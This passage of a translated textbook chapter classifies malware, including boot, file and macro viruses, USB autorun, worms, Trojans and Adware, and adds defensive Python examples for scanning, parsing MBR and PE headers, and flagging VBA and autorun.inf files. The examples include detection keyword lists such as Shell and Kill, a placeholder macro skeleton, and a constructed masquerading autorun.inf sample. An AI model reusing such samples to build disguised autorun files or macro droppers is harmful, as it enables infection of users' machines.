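    an unpacking stub, but the byte-level effect on the body is the same."""
    return zlib.compress(data, 9)


def unpack(data: bytes) -> bytes:
    """What a scanner with an unpacking engine does before signature matching."""
    return zlib.decompress(data)


def byte_similarity(a: bytes, b: bytes) -> float:
    """Fraction of positions (over the shorter length) where the bytes agree."""
    n = min(len(a), len(b))
    return sum(x == y for x, y in zip(a, b)) / n if n else 0.0


# Constructed sample object: header, "code", marker, padding (128 bytes total).
ORIGINAL = b"\x4d\x5a\x90\x00" + b"\x00" * 60 + b"PAYLOAD-MARKER" + b"\x90" * 50

# The author's "new modification": one byte of the core changed, signatures intact.
VARIANT = bytearray(ORIGINAL)
VARIANT[40] = 0x01
VARIANT = bytes(VARIANT)


def demo() -> dict:
    return {
        "original_hits": scan(ORIGINAL),
        "variant_hits": scan(VARIANT),                 # still detected
        "packed_hits": scan(pack(ORIGINAL)),           # nothing matches
        "unpacked_hits": scan(unpack(pack(VARIANT))),  # detected again after unpacking
        "raw_similarity": byte_similarity(ORIGINAL, VARIANT),
        "packed_similarity": byte_similarity(pack(ORIGINAL), pack(VARIANT)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the last two entries in demo() is the one the text makes: the raw variant differs from the original in a single byte, while the two packed outputs share almost nothing, so a scanner that cannot unpack the object first has nothing to match against.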

Malware (sometimes also called destructive software influences) is customarily taken to include computer viruses and software bookmarks (software implants). The term computer virus was first introduced by the US specialist F. Cohen in 1984. A "classical" computer virus is an autonomously functioning program that simultaneously has three properties:

  • the ability to include its code in the bodies of other objects (files and system areas of computer memory);
  • subsequent independent implementation;
  • independent distribution in computer systems.

Computer viruses do not use network services to penetrate other computers on the network. A copy of the virus reaches remote computers only if the infected object, for some reason beyond the control of the virus, is activated on another computer, for example:

  • when infecting network drives accessible to the user, the virus penetrated files located on those network resources;
  • the virus has copied itself to removable media or infected files on it;
  • The user sent an email with a virus-infected attachment.

An important fact is that viruses do not have the means to spread beyond the boundaries of one computer. This can only happen when a removable storage medium (floppy disk, flash drive) is infected or when the user himself transfers a virus-infected file to another computer over the network.

Boot viruses infect the master boot sector of a hard disk (Master Boot Record, MBR) or the boot sector of a hard disk partition, system floppy disk or boot CD (Boot Record, BR), replacing the bootstrap and operating system loader programs contained in them with their own code. The original contents of these sectors are stored in one of the free sectors of the disk or directly in the body of the virus.

After infecting the MBR, which is the first sector of the zero head of the zero cylinder of the hard disk, the virus gains control immediately after the completion of the hardware test procedure (POST), the BIOS Setup program (if it was called by the user), BIOS procedures and its extensions. Having gained control, the boot virus performs the following actions:

  • 1) copying its code to the end of the computer's RAM, thereby reducing the size of its free part;
  • 2) overriding several BIOS interrupts, mainly related to accessing disks;
  • 3) loading the true boot program into RAM; its functions include viewing the hard drive partition table, determining the active partition, and loading and transferring control to the operating system loader of the active partition;
  • 4) transfer of control to the true bootstrap program.
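What the true boot program reads from the MBR (the 0x55AA signature, the partition table, the single active partition), and how the boot-code area of that sector can be baselined for the integrity checking described earlier, as an added example that is not code from the original text. The 512-byte sector is constructed; parse_partitions(), active_partition() and boot_code_digest() are names chosen here.

```python
"""Read a classic Master Boot Record the way the genuine boot program does:
check the signature, walk the partition table, find the active partition.

Added example, not code from the original text. The MBR below is constructed
(dummy boot code, one active and one inactive entry, valid 0x55AA signature).
Classic MBR layout: bytes 0..445 boot code, 446..509 four 16-byte partition
entries, 510..511 signature.
"""
import hashlib
import struct
from typing import Optional

PART_TABLE_OFFSET = 446
# status, (3 CHS bytes), type, (3 CHS bytes), LBA start, sector count
PART_ENTRY = struct.Struct("<B3xB3xII")
BOOT_SIGNATURE = b"\x55\xaa"


def parse_partitions(mbr: bytes) -> list[dict]:
    """Decode the four partition entries; raise on a malformed sector."""
    if len(mbr) != 512:
        raise ValueError("MBR must be exactly 512 bytes")
    if mbr[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for i in range(4):
        status, ptype, lba_start, sectors = PART_ENTRY.unpack_from(
            mbr, PART_TABLE_OFFSET + i * PART_ENTRY.size)
        parts.append({"index": i, "active": status == 0x80, "type": ptype,
                      "lba_start": lba_start, "sectors": sectors})
    return parts


def active_partition(mbr: bytes) -> Optional[dict]:
    """The entry the boot program would hand control to; None if the table has
    no active entry or more than one (an invalid table)."""
    active = [p for p in parse_partitions(mbr) if p["active"]]
    return active[0] if len(active) == 1 else None


def boot_code_digest(mbr: bytes) -> str:
    """SHA-256 of the boot-code area only. The partition table changes
    legitimately; the boot code normally does not, so a digest recorded while
    the disk was known clean is a usable integrity baseline for this sector."""
    return hashlib.sha256(mbr[:PART_TABLE_OFFSET]).hexdigest()


def make_entry(status: int, ptype: int, lba_start: int, sectors: int) -> bytes:
    # CHS fields are left zero; the LBA fields are what is used in practice.
    return PART_ENTRY.pack(status, ptype, lba_start, sectors)


# Constructed sample sector.
BOOT_CODE = b"\xfa\x33\xc0" + b"\x90" * 443             # cli; xor ax,ax; padding
SAMPLE_MBR = (BOOT_CODE
              + make_entry(0x80, 0x07, 2048, 204800)    # active, type 0x07
              + make_entry(0x00, 0x83, 206848, 409600)  # inactive, type 0x83
              + make_entry(0, 0, 0, 0) * 2              # unused entries
              + BOOT_SIGNATURE)
assert len(SAMPLE_MBR) == 512

# A tampered copy: boot-code area altered, partition table untouched.
TAMPERED_MBR = b"\xeb" + SAMPLE_MBR[1:]


if __name__ == "__main__":
    print(active_partition(SAMPLE_MBR))
    print(boot_code_digest(SAMPLE_MBR) == boot_code_digest(TAMPERED_MBR))
```

The tampered copy still parses to the same active partition, which is exactly why a signature-valid, bootable-looking MBR tells you nothing on its own; only comparing the boot-code digest against a recorded baseline reveals that the first 446 bytes changed.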

A boot virus in the BR works in a similar way, replacing the operating system loader program. A common way for a computer to become infected with a boot virus is an accidental attempt to boot from a non-system floppy disk (or CD) whose boot sector is infected. This situation occurs when an infected floppy disk is left in the drive when the operating system is rebooted. Once the master boot sector of a hard drive is infected, the virus spreads the first time any uninfected floppy disk is accessed.

Boot viruses usually belong to the group of resident viruses. They were quite common in the 1990s but practically disappeared with the transition to 32-bit operating systems and the abandonment of floppy disks as the main means of exchanging information. Theoretically, boot viruses could appear that infect CDs and flash disks, but so far no such viruses have been detected.

File viruses infect files of various types:

  • program files, device driver files and other operating system modules;
  • document files that may contain macros;
  • document files that may contain scripts, or separate script files, etc.

When a file is infected, the virus writes its code to the beginning, middle, or end of the file, or to several places at once. The source file is modified so that once the file is opened, control is immediately transferred to the virus code. After receiving control, the virus code performs the following sequence of actions:

  • 1) infection of other files (combined viruses) and system areas of disk memory;
  • 2) installation of own resident modules (resident viruses) in RAM;
  • 3) performing other actions depending on the algorithm implemented by the virus;
  • 4) continuation of the usual procedure for opening a file (for example, transferring control to the source code of the infected program).

When infecting program files, viruses change the file header in such a way that, after the program is loaded into RAM, control is transferred to the virus code. For example, the portable executable file format of the Windows and OS/2 operating systems (Portable Executable, PE) has the following structure:

  • 1) header in MS-DOS operating system format;
  • 2) code of the real processor mode program, which takes control when trying to launch a Windows application in the MS-DOS operating system environment;
  • 3) PE file header;
  • 4) additional (optional) PE file header;
  • 5) headers and bodies of all application segments (program code, its static data, data exported by the program, data imported by the program, debugging information, etc.).

The section containing the optional PE file header includes a field containing the address of the application's entry point. Immediately before the entry point in the application code segment is an Import Address Table (IAT), which is populated with valid addresses when the executable code is loaded into the process's address space.

When a virus infects a program file, the application's entry point address is changed to point to the beginning of the virus code and ensure that it automatically takes control when the program file is loaded. It is also possible to modify operating system kernel modules (for example, kernel32.dll) to intercept calls to some system functions (for example, CreateProcess, CreateFile, ReadFile, WriteFile, CloseHandle) to infect other files.
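A header walk from the MZ header through e_lfanew to the optional header's AddressOfEntryPoint and the section table, reporting which section owns the entry point, as an added example that is not code from the original text. Header offsets follow the public PE/COFF specification; the two PE32 images are constructed, headers-only byte strings; the flags raised in entry_point_report() (entry point in a writable or in the last section) are illustrative heuristics of my own, not a rule stated on the page.

```python
"""Read a PE file's headers, find the entry point and the section it lands in.

Added example, not code from the original text. The images below are
constructed in memory and consist of headers only (no code).
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(image: bytes) -> tuple[int, list[dict]]:
    """Return (AddressOfEntryPoint, section list) or raise ValueError."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]      # DOS header -> PE header
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                        # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20                                            # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]   # AddressOfEntryPoint
    first = opt + opt_size                                     # section table
    sections = []
    for i in range(nsections):
        (name, vsize, va, rawsize, rawptr,
         _, _, _, _, chars) = SECTION_HDR.unpack_from(image, first + i * SECTION_HDR.size)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize,
            "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "write": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return entry_rva, sections


def entry_point_report(image: bytes) -> dict:
    """Which section owns the entry point, plus heuristic observations (my own)."""
    entry_rva, sections = parse_pe(image)
    home = next((i for i, s in enumerate(sections)
                 if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    flags = []
    if home is None:
        flags.append("entry point outside all sections")
    else:
        s = sections[home]
        if not s["exec"]:
            flags.append("entry section not executable")
        if s["write"]:
            flags.append("entry section writable and executable")
        if len(sections) > 1 and home == len(sections) - 1:
            flags.append("entry point in last section")
    return {"entry_rva": entry_rva,
            "section": None if home is None else sections[home]["name"],
            "flags": flags}


def build_image(entry_rva: int, sections: list[tuple[str, int, int, int]]) -> bytes:
    """Construct a headers-only PE32 image. sections: (name, va, size, characteristics)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)                 # DOS header + (empty) real-mode stub
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                      # PE32 optional header, 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)     # magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)
    table = b"".join(
        SECTION_HDR.pack(name.encode().ljust(8, b"\0"), size, va, size,
                         0x400 + i * 0x200, 0, 0, 0, 0, chars)
        for i, (name, va, size, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Constructed images. 0x60000020 = CODE|EXECUTE|READ, 0xC0000040 = INITIALIZED_DATA|READ|WRITE.
NORMAL = build_image(0x1100, [(".text", 0x1000, 0x800, 0x60000020),
                              (".data", 0x2000, 0x400, 0xC0000040)])
# Entry point redirected into an appended writable+executable last section,
# the header change described for file infectors above (0xE0000020 adds WRITE).
REDIRECTED = build_image(0x3010, [(".text", 0x1000, 0x800, 0x60000020),
                                  (".data", 0x2000, 0x400, 0xC0000040),
                                  (".extra", 0x3000, 0x200, 0xE0000020)])

if __name__ == "__main__":
    print(entry_point_report(NORMAL))
    print(entry_point_report(REDIRECTED))
```

Comparing the stored entry-point RVA and section table against a copy taken when the file was known clean is the integrity check from the beginning of the chapter applied to one file; the heuristic flags are only a hint of where to look when no baseline exists.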

One variety of file virus lives in the clusters of an infected logical disk or floppy disk. On infection, the virus code is copied to one of the free disk clusters, which is marked in the File Allocation Table (FAT) as the last cluster of a file. Then the directory entries of program files are changed: instead of the number of the first cluster allocated to the file, the number of the cluster containing the virus code is placed there. The true number of the first cluster of the infected file is encrypted and stored, for example, in an unused part of the file's directory entry.

When an infected file is launched, control is obtained by the virus code, which:

  • 1) installs its resident module in RAM, which will subsequently intercept all access to the infected disk;
  • 2) loads the source program file and transfers control to it.

When the directory with infected files is subsequently accessed, the resident part of the virus passes to the operating system the true numbers of the first clusters allocated to the infected files.

Viruses in document files created, for example, by Microsoft Office programs are distributed using macros included in them (procedures in the Visual Basic for Applications - VBA programming language). Therefore, such viruses are sometimes called macro viruses or simply macroviruses.

Macro programming languages, especially VBA, are universal languages that support object-oriented programming, have a large library of standard macro commands and allow quite complex procedures to be created. In addition, VBA supports macros that run automatically on certain events (for example, opening a document) or on certain user actions (for example, invoking the command to save a document to a file).

Examples of automatically running macros associated with specific Microsoft Word document processing events include:

  • AutoExec (automatically executed when the Microsoft Word word processor starts, if located in the normal.dot template file or in a file in the Startup subfolder of the Microsoft Office folder);
  • AutoNew (automatically takes control when creating a new document);
  • AutoOpen (automatically executed when opening a document);
  • AutoClose (automatically executed when closing a document);
  • AutoExit (automatically takes control when the Microsoft Word word processor exits).

The Microsoft Excel spreadsheet processor supports only some of the automatically executed macros, and the names of these macros are slightly changed - Auto_open and Auto_close.

The Microsoft Word word processor also defines macros that automatically receive control when the user invokes one of the standard commands: FileSave (File | Save), FileSaveAs (File | Save As), ToolsMacro (Tools | Macro | Macros), ToolsCustomize (Tools | Customize), etc.

A Microsoft Office document may also contain macros that automatically receive control when the user presses a certain combination of keys on the keyboard or reaches a certain point in time (date, time of day).

Any macro (including automatically executed ones) from a separate document can be written to the normal.dot template file (and vice versa) and thereby become available when editing any Microsoft Word document. Writing a macro to the normal.dot file can be done using the standard MacroCopy macro command (WordBasic), the OrganizerCopy method of the Application object, or the Copy methods of the standard Organizer (Microsoft Word) and Sheets (Microsoft Excel) objects.

To manipulate files in the computer's external memory, macros can use the standard macro commands Open (open an existing file or create a new one), SetAttr (change file attributes), Name (rename a file or folder), Get (read data from an open file), Put (write data to an open file), Seek (change the current read or write position in a file), Close (close a file), Kill (delete a file), RmDir (delete a folder), MkDir (create a new folder), ChDir (change the current folder), etc.

A standard Shell macro command allows you to execute any program or system command installed on your computer.

Thus, the VBA programming language may well be used by authors of macro viruses to create very dangerous code. The simplest macro virus in a Microsoft Word document infects other document files as follows:

  • 1) when an infected document is opened, control is given to the macro containing the virus code;
  • 2) the virus places other macros with its own code in the normal.dot template file (for example, FileOpen, FileSaveAs and FileSave);
  • 3) the virus sets the corresponding flag in the Windows registry and (or) in the Microsoft Word initialization file indicating that the infection has occurred;
  • 4) when Microsoft Word is subsequently launched, the first file opened is actually the already infected template file normal.dot, which allows the virus code to automatically take control, and infection of other document files can occur when they are saved using standard Microsoft Word commands.
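Detection logic over extracted VBA source that matches the names enumerated above: the Word auto-execute macros and their Excel counterparts Auto_open and Auto_close, the command-overriding macros (FileSave, FileSaveAs, FileOpen, ToolsMacro, ToolsCustomize), the file and template commands (Kill, SetAttr, RmDir, MacroCopy, OrganizerCopy) and Shell, plus references to normal.dot. This is an added example, not code from the original text or from any antivirus product. Both macro sources are constructed; the second is a skeleton with placeholder arguments, not a working macro; the scoring weights are an assumption chosen here, and extracting the VBA from the document file itself is a separate step the example does not perform.

```python
"""Flag VBA source that uses the auto-executing macro names and file/shell
commands discussed in the text.

Added example, not code from the original text. The two macro sources are
constructed strings; the weights are illustrative.
"""
import re

# Event-driven macros (Word) and their Excel counterparts, as listed in the text.
AUTO_MACROS = {"autoexec", "autonew", "autoopen", "autoclose", "autoexit",
               "auto_open", "auto_close"}
# Macros that take over standard Word commands.
COMMAND_MACROS = {"filesave", "filesaveas", "fileopen", "toolsmacro", "toolscustomize"}
# Macro commands / methods from the text that act on files, templates or programs.
SUSPICIOUS_CALLS = ("Shell", "Kill", "MacroCopy", "OrganizerCopy", "SetAttr", "RmDir")
TEMPLATE_REFS = ("normal.dot", "NormalTemplate")

# Procedure declarations: [Public|Private] Sub|Function <name>
PROC_RE = re.compile(r"^\s*(?:public\s+|private\s+)?(?:sub|function)\s+([a-z_]\w*)",
                     re.IGNORECASE | re.MULTILINE)


def analyze_vba(src: str) -> dict:
    """Score a VBA module by the auto-run names, command overrides and calls it uses."""
    procs = PROC_RE.findall(src)
    lowered = {p.lower(): p for p in procs}          # VBA names are case-insensitive
    auto = sorted(lowered[p] for p in lowered if p in AUTO_MACROS)
    cmd = sorted(lowered[p] for p in lowered if p in COMMAND_MACROS)
    calls = sorted(c for c in SUSPICIOUS_CALLS
                   if re.search(r"\b%s\b" % c, src, re.IGNORECASE))
    template = any(t.lower() in src.lower() for t in TEMPLATE_REFS)
    score = 3 * len(auto) + 2 * len(cmd) + len(calls) + (2 if template else 0)
    return {"procedures": procs, "auto_macros": auto, "command_macros": cmd,
            "suspicious_calls": calls, "template_reference": template, "score": score}


# Constructed benign module: ordinary document formatting helpers.
BENIGN_MACRO = """\
Sub FormatReport()
    ' Constructed sample: formats the current selection
    Selection.Font.Bold = True
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
End Sub

Private Function WordCount(rng As Range) As Long
    WordCount = rng.Words.Count
End Function
"""

# Constructed skeleton mirroring the steps listed in the text; the angle-bracket
# arguments are placeholders, so this is not a functioning macro.
SUSPECT_MACRO = """\
Sub AutoOpen()
    ' Constructed skeleton with placeholders
    Application.OrganizerCopy "<this document>", "<normal.dot path>", "<module>", 0
    Shell "<program>"
End Sub

Sub FileSaveAs()
    Kill "<some file>"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("suspect", SUSPECT_MACRO)):
        print(label, analyze_vba(src))
```

A procedure named AutoOpen or FileSaveAs is not malicious by itself (legitimate templates use them), which is why the example weights the combination: an auto-run entry point, a command override, template manipulation and a file or shell command together in one module is the pattern the four steps above describe.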

We can say that most macro viruses belong to the group of resident viruses, since part of their code is constantly present in the computer’s RAM while the program from the Microsoft Office package is running.

The placement of the macro virus code inside a Microsoft Office document can be indicated quite schematically, since the document file format is very complex and contains a sequence of data blocks of various formats, combined with each other using a large amount of service data. A special feature of macro viruses is that they can infect document files on computers of various platforms, not just IBM PC. Infection will be possible if office programs that are fully compatible with programs from the Microsoft Office suite are installed on the computer.

When saving document files, they also include random data that is not related to the content of the document, but contained in blocks of RAM that are allocated but not completely filled when editing the document. Therefore, when adding new data to a document, its size may change in an unpredictable way, including decreasing. This does not allow us to judge whether a document file is infected with macro viruses, since its size after infection will also change unpredictably. We also note that information accidentally saved along with a public document file may contain confidential information.

Most known macro viruses place their code only in macros. However, there are also types of viruses in document file macros in which the virus code is stored not only in macros. These viruses include a small macro loader of the main virus code, which calls the macro editor built into Microsoft Office, creates a new macro with the virus code, executes it, and then deletes the created macro to hide traces of its presence. In this case, the main virus code is present as an array of strings either in the body of the loader macro or in the variable area of the infected document.

Infecting the normal.dot template file is not the only way macro viruses can spread on a user's computer. Additional template files located in the Startup folder inside the Microsoft Office folder can also be infected. Another way to infect user document files with macro viruses is to inject them into Microsoft Word add-in files located in the Addins folder of the Microsoft Office folder. Macro viruses that do not place their code in the common normal.dot template can be classified as non-resident viruses. To infect other files, these macro viruses either use the standard VBA macro commands for working with files and folders, or use the list of files recently edited by the user, which is contained in the "File" submenu of Microsoft Word and other Microsoft Office programs.

The Microsoft Excel spreadsheet does not use the normal.dot template file, so files from the Startup folder are used to infect other user document files. A special feature of macro viruses that infect Excel spreadsheet files is that they can be written using not only the VBA programming language, but also the macro language of “old” versions of Microsoft Excel, which is also supported in later versions of this spreadsheet processor.

In the Microsoft Access database management system, macros written in a special scripting language that has very limited capabilities are used to automatically obtain control when some event occurs (for example, opening a database). But these automatically executed script macros (for example, the AutoExec macro that automatically takes control when you start Microsoft Access) can call full macros written in VBA. Therefore, in order to infect a Microsoft Access database, a virus must create or replace an automatically executed macro script and copy a module with macros containing the main part of the virus code into the infected database.

Combined viruses are known that can infect both Microsoft Access databases and Microsoft Word documents. Such a virus consists of two main parts, each of which infects document files of its own type (.doc or .mdb). But both parts of such a virus are capable of transferring their code from one Microsoft Office application to another. When transferring virus code from Microsoft Access, an infected additional template file (.dot file) is created in the Startup folder, and when transferring virus code from Microsoft Word, an infected Access database file is created, which is passed as a parameter to the Microsoft Access application (msaccess.exe) launched by the virus code.

Antivirus companies are reporting a new trend in the spread of viruses. After a wave of email and script viruses, flash drives connected to a computer using USB are now one of the most popular ways to spread malware. This became possible due to the weakness of the Windows operating system, which by default automatically launches the autorun.inf file from a removable drive.

According to some experts, the INF/Autorun service in Windows can be considered the main security hole in computer systems. Unlike infected programs sent by email, in this case even a competent user is practically unable to prevent infection: it is enough to insert an infected device into a USB connector, and the process becomes irreversible. The only prevention is to disable autorun, which is recommended even by security experts from Microsoft itself.
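An analyzer that reads an autorun.inf and reports what Windows would do with it on media insertion, as an added example that is not code from the original text. Both .inf texts are constructed with placeholder file names (not indicators from any real incident); the directive names (open, shellexecute, shell\verb\command, shell, action, icon, label) are the documented autorun.inf keys; autorun_report() and its indicator wording are my own.

```python
"""Inspect an autorun.inf and report what it would make Windows do on insertion.

Added example, not code from the original text. Both .inf texts are constructed
with placeholder file names.
"""
import configparser
import re

# shell\<verb>\command redefines what Explorer runs for that verb on the drive.
SHELL_VERB_RE = re.compile(r"^shell\\([^\\]+)\\command$")


def parse_autorun(text: str) -> dict:
    """Return the lower-cased key/value pairs of the [autorun] section, or {}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":            # section name is case-insensitive
            return {k.lower(): v.strip() for k, v in cp.items(section)}
    return {}


def autorun_report(text: str) -> dict:
    """Programs the file would launch, verbs it redefines, and why it looks risky."""
    keys = parse_autorun(text)
    targets = set()
    indicators = []
    for k in ("open", "shellexecute"):              # both start a program on insertion
        if k in keys:
            targets.add(keys[k])
    if targets:
        indicators.append("launches a program on media insertion")
    verbs = {}
    for k, v in keys.items():
        m = SHELL_VERB_RE.match(k)
        if m:
            verbs[m.group(1)] = v
            targets.add(v)
    if verbs.keys() & {"open", "explore"}:
        indicators.append("redefines Explorer's Open/Explore verbs")
    if "open folder" in keys.get("action", "").lower():
        indicators.append("action text imitates the Windows prompt")
    if keys.get("shell", "").lower() in verbs:
        indicators.append("default verb points at a custom command")
    return {"launch_targets": sorted(targets),
            "custom_verbs": sorted(verbs),
            "indicators": indicators}


# Constructed: what a vendor's install media typically carries.
VENDOR_INF = """\
[autorun]
open=setup.exe
icon=setup.exe,0
label=Vendor Installer
"""

# Constructed: every directive pointed at one hidden program, with the Explorer
# verbs and prompt text overridden so that "opening the folder" runs it too.
MASQUERADING_INF = """\
[AutoRun]
; constructed sample, placeholder file names
open=hidden\\update.exe
shellexecute=hidden\\update.exe
shell\\open\\command=hidden\\update.exe
shell\\explore\\command=hidden\\update.exe
shell=open
action=Open folder to view files
icon=%SystemRoot%\\system32\\shell32.dll,4
"""

if __name__ == "__main__":
    print(autorun_report(VENDOR_INF))
    print(autorun_report(MASQUERADING_INF))
```

The report only describes the file; it does not stop anything. The mitigation the text names, disabling autorun, is what removes the risk, and a tool like this is useful for triaging removable media after the fact or for confirming that nothing on a drive would have been started.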

You could say that in some ways, the spread of viruses on USB drives is a return to the origins of virus creation, when the Internet did not yet exist. Back then, viruses spread from computer to computer using floppy disks.

A software bookmark (software implant) is a program, external or internal to the attacked computer system, that has certain destructive functions with respect to that system:

  • distribution in distributed computer systems in order to implement one or another threat to information security (computer or network worms, which, unlike computer viruses, should not have the property of including their code in the bodies of other files);
  • carrying out various actions unauthorized by the user (collection of confidential information and its transfer to the violator, destruction or intentional modification of user information, disruption of the computer, use of computer resources for unseemly purposes (“Trojan” programs or simply “Trojans”);
  • destruction or modification of the functioning of the CS software, destruction or change of data processed in it after the fulfillment of some condition or receipt of some message from outside the CS (“logic bombs”);
  • substitution of individual functions of the CS security subsystem or creation of “traps” in it to implement threats to the security of information in the CS (for example, substitution of encryption means by emulating the operation of a hardware encryption board installed in the CS);
  • intercepting CS users' passwords by simulating the password prompt or by intercepting all user input from the keyboard;
  • interception of the flow of information transmitted between objects of a distributed CS (monitors);
  • opportunistic programs that are developed by legitimate manufacturers but contain potentially dangerous functions that can be used by an attacker.

As a rule, in order for a network worm to begin its work, you need to launch a file received by e-mail (or follow the link contained directly in the e-mail message). But there are also worms whose activation does not require human intervention:

  • the worm is contained in the body of the message itself and is launched when the user simply opens the message (or it is opened in the preview pane of the mail client window); the message in this case is marked-up text containing a script with the worm code;
  • the worm exploits "holes" (gaps, vulnerabilities) in the security of operating systems and other programs (for example, email clients).

To induce a user to run a file received by email, criminals use very sophisticated technologies called social engineering. For example, an offer to fill out the form attached to the letter in order to receive a large cash prize that the user allegedly won. Or disguised as an official mailing from a well-known software company (you should know that these companies never send out any files without the user’s request), etc.

Once launched, the worm is able to send its code by email using the “address book” of the email program. After this, the computers of friends of the user of the infected computer are also infected.

The main difference between network worms and classical viruses is precisely the ability to self-propagate across the network, as well as the absence of the need to infect other local objects on the infected computer.

To spread, network worms use a variety of computer and mobile networks: email, instant messaging systems, file-sharing (P2P) and IRC networks, local area networks (LAN), data exchange networks between mobile devices (phones, PDAs), etc.

Most known worms are distributed in the form of files: an attachment to an email, a link to an infected file on a Web or FTP resource, a file sent in ICQ and IRC messages, a file in a P2P shared directory, etc. Some worms (so-called "fileless" or "packet" worms) spread in the form of network packets, penetrating directly into the computer's memory and activating their code there.

Some worms also have properties of other types of malware. For example, some worms contain functions for collecting and transmitting to the intruder confidential information of the user of the infected computer or are capable of infecting executable files on the local disk of the infected computer, i.e., they have the properties of a Trojan program and (or) a computer virus.

Fig. 4.1 shows the distribution of computer viruses (virus) and the various categories of network worms (worm) in 2008 (according to Kaspersky Lab).

Fig. 4.1.

Certain categories of Trojan programs cause damage to remote computers and networks without harming the infected computer (for example, Trojan programs designed for massive DDoS attacks on remote network resources).

Unlike worms and viruses, Trojans do not damage other files and do not have their own means of spreading. These are simply programs that perform actions harmful to the user of an infected computer, for example, intercepting a password for accessing the Internet.

Currently, within the class of Trojan programs, Kaspersky Lab experts identify three main groups of behaviors:

  • Backdoor (giving an attacker the ability to administer an infected computer remotely), Trojan-Downloader (delivery of other malicious programs to the user's computer), Trojan-PSW (password interception) and Trojan (other Trojan programs): the most common Trojan programs;
  • Trojan-Spy (spyware), Trojan-Dropper (installers for other malicious programs);
  • Trojan-Proxy ("Trojan" proxy servers), Trojan-Clicker (Internet clickers), Rootkit (hiding their presence in the computer system), Trojan-DDoS (programs for participating in distributed denial-of-service attacks), Trojan-SMS ("mobile Trojans", the most pressing threat to mobile devices).

Some programs have a set of functions that can harm the user only if a number of conditions are met. Moreover, such programs can be legally sold and used in everyday work, for example, by system administrators. However, in the hands of an intruder, such programs can turn into a tool that can be used to cause harm to the user. Kaspersky Lab specialists classify such programs into a separate group of conditionally dangerous programs (they cannot be unambiguously classified as either dangerous or safe).

This type of program is optionally detected by anti-virus programs if the user consciously selects an expanded set of anti-virus databases. If the programs discovered when using extended databases are familiar to the user and he is 100% sure that they will not cause harm to his data (for example, the user himself purchased this program, is familiar with its functions and uses them for legal purposes), then the user can either refuse further use of extended anti-virus databases, or add such programs to the list of “exceptions” (programs for which further detection will be disabled).

Potentially dangerous programs include programs of the classes RiskWare (legally distributed potentially dangerous programs), PornWare (programs for displaying pornographic information) and AdWare (advertising software).

The RiskWare class of programs includes legal programs (some of them are freely sold and widely used for legal purposes), which, nevertheless, in the hands of an intruder, can cause harm to the user and his data. In such programs you can find legal remote administration utilities, IRC client programs, auto-dialer programs (dialers), download programs (downloaders), monitors of any activity (monitor), utilities for working with passwords, as well as numerous Internet servers for FTP, Web, Proxy and Telnet services.

None of these programs is malicious in itself, but they do have capabilities that attackers can take advantage of to cause harm to users. For example, a remote administration program gives access to the interface of a remote computer and can be used to manage and monitor the remote machine. Such a program may be completely legal, freely distributed and necessary in the work of system administrators or other technical specialists. However, in the hands of violators, such a program can cause harm to the user and his data by giving full remote access to someone else's computer.

As another example, consider a utility that is a client of an IRC network: the advanced functionality of such a utility can be taken advantage of by violators and the Trojan programs they distribute (in particular, Backdoor), which use the functions of such a client in their work. Thus, a Trojan program is capable of adding its own scripts to the IRC client configuration file without the user’s knowledge and successfully performing its destructive functions on the infected machine. In this case, the user will not even suspect that a malicious Trojan program is operating on his computer.

Often, malicious programs independently install an IRC client on the user’s computer for subsequent use for their own purposes. In this case, the location is usually the Windows folder and its subfolders. Finding an IRC client in these folders almost certainly indicates that the computer has been infected with some kind of malware.

Advertising software (Adware, Advware, Spyware, Browser Hijackers) is designed to display advertising messages (most often in the form of graphic banners) and to redirect search queries to advertising Web pages. Apart from displaying advertisements, such programs, as a rule, do not show their presence in the system in any way, and typically Adware programs have no uninstallation procedure. Adware gets onto the user's computer in two ways:

  • by embedding advertising components into free and shareware software (freeware, shareware);
  • through unauthorized installation of advertising components when the user visits “infected” Web pages.

Most programs in the freeware and shareware categories stop displaying advertisements after they are purchased and/or registered. Such programs often use built-in Adware utilities from third-party manufacturers. In some cases, these Adware utilities remain installed on the user’s computer even after registering the programs with which they originally entered the user’s system. At the same time, removing the Adware component that is still used by any program to display advertising may lead to malfunctions of this program.

The basic purpose of this type of Adware is an implicit form of payment for software, carried out by showing advertising information to the user (advertisers pay the advertising agency for displaying their advertising, and the advertising agency pays the Adware developer). Adware helps reduce costs both for software developers (income from Adware encourages them to write new and improve existing programs) and for users themselves.

In the case of installation of advertising components when a user visits “infected” Web pages, in most cases hacker technologies are used (penetration into the computer through a gap in the security system of the Internet browser, as well as the use of “Trojan” programs designed to covertly install software). Adware programs that act in this way are often called “Browser Hijackers.”

